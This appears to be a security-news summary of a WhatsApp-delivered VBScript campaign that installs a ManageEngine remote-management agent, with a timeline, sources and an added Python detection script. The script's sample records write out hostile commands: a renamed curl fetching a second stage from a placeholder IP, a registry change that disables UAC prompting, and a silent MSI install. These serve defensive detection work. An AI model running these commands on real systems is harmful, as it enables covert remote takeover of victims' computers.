Malicious VBScript Sent via WhatsApp Installs ManageEngine RMM Agent
Researchers reported an active campaign in which compromised WhatsApp accounts sent malicious .vbs attachments to targets in multiple countries, with most observed infections in Malaysia. The lures impersonated business, banking, tax, and debt-related documents and primarily targeted users of WhatsApp Desktop and WhatsApp Web. When opened, the VBScript launched through Windows Script Host, created hidden working directories, and fetched additional payloads from attacker-controlled infrastructure while using obfuscation and renamed native tools such as curl.exe and bitsadmin.exe to reduce detection.
A second-stage script attempted to weaken Windows User Account Control by changing ConsentPromptBehaviorAdmin, then downloaded a ZIP archive containing a preconfigured ManageEngine Endpoint Central deployment package. The final stage silently installed the legitimate ManageEngine Endpoint Central agent via msiexec.exe, giving the attacker remote administration access to the compromised system. Attribution remains unconfirmed, but researchers noted simplified Chinese comments in the scripts and infrastructure overlap with IP addresses previously associated with ValleyRAT and Gh0st RAT activity, indicating with low confidence that a Chinese-speaking operator may be behind the campaign.
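As an added example (not code from this write-up or from any of the sources it cites), the Python below runs a small detection pass over constructed Sysmon-style process-creation records that mirror the chain described: a .vbs run by Windows Script Host from a WhatsApp client, a renamed curl.exe or bitsadmin.exe spotted through a PE OriginalFileName mismatch, ConsentPromptBehaviorAdmin set to 0, and a quiet msiexec install launched from a script host. All paths, file names and the 203.0.113.10 address are placeholders, not observed indicators.

```python
import re
# Constructed sample records (field names follow Sysmon Event ID 1); the
# paths, the IP and the file names are placeholders, not observed indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\WhatsApp\WhatsApp.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\Invoice_Overdue.vbs"'},
    {"Image": r"C:\Users\u\AppData\Local\Temp\svc\update.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "update.exe -o stage2.vbs http://203.0.113.10/stage2"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
                    r" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\svc\agent.msi /qn"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]
NATIVE_DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return detection tags for one process-creation record (empty if benign)."""
    tags = []
    img, orig = basename(ev["Image"]), ev.get("OriginalFileName", "").lower()
    parent, cmd = basename(ev["ParentImage"]), ev["CommandLine"]
    # Stage 1: Windows Script Host running a .vbs spawned by a WhatsApp client.
    if img in SCRIPT_HOSTS and "whatsapp" in ev["ParentImage"].lower() and ".vbs" in cmd.lower():
        tags.append("vbs-from-messenger")
    # Renamed curl.exe / bitsadmin.exe: the PE's OriginalFileName no longer matches the image name.
    if orig in NATIVE_DOWNLOADERS and img != orig:
        tags.append("renamed-native-downloader")
    # UAC weakened: ConsentPromptBehaviorAdmin set to 0 (elevate without prompting).
    if img == "reg.exe" and re.search(r"consentpromptbehavioradmin.*\s/d\s+0\b", cmd, re.I):
        tags.append("uac-weakened")
    # Final stage: quiet MSI install launched from a script host.
    if img == "msiexec.exe" and re.search(r"/i\b", cmd, re.I) and re.search(r"/q[nb]?\b", cmd, re.I) \
            and parent in SCRIPT_HOSTS:
        tags.append("silent-msi-from-script-host")
    return tags

def scan(events):
    """Map event index -> tags, keeping only events that raised at least one."""
    return {i: t for i, ev in enumerate(events) if (t := classify(ev))}
```

Calling `scan(SAMPLE_EVENTS)` tags the first four records, one stage each, and leaves the benign notepad.exe record untagged.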

How this story unfolded
Kaspersky reveals new technical and attribution details on WhatsApp malware
Kaspersky disclosed additional details on the WhatsApp malware campaign, saying hijacked accounts sent fake debt-related VBScript attachments that used multi-stage obfuscated scripts, attempted to weaken Windows UAC via registry changes, and silently installed a pre-configured ManageEngine Endpoint Central agent. The researchers also reported infrastructure overlap with activity linked to ValleyRAT and Gh0st RAT, but said attribution remained unconfirmed and only low-confidence indicators suggested a Chinese-speaking operator.
Researchers observe WhatsApp-delivered VBS malware campaign
Researchers observed an active malware campaign in June 2026 in which compromised WhatsApp accounts sent malicious VBScript attachments to victims in multiple countries, with Malaysia accounting for most observed infections. The infection chain ultimately installed the legitimate ManageEngine Endpoint Central agent to provide the attacker with remote administration access.
Sources
WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Tool (thehackernews.com)
A VBScript Campaign Distributed Through WhatsApp Deploying RMM Software (community.gurucul.com)
WhatsApp Malware Campaign Targets Global Users Through Fake Financial Documents and Remote Access Tools (cysecurity.news)
WhatsApp Malware Campaign Hijacks Trust, Installs Legitimate Admin Tools (securityaffairs.com)
New Malware Attack Via WhatsApp Attacking Windows System to Enable Remote Access For Attackers (cybersecuritynews.com)
A VBScript campaign distributed through WhatsApp deploying RMM software (malware.news)
WhatsApp phishing attack uses fake business docs to hack PCs (bleepingcomputer.com)
An unknown actor distributes malicious VBS scripts via WhatsApp (securelist.com)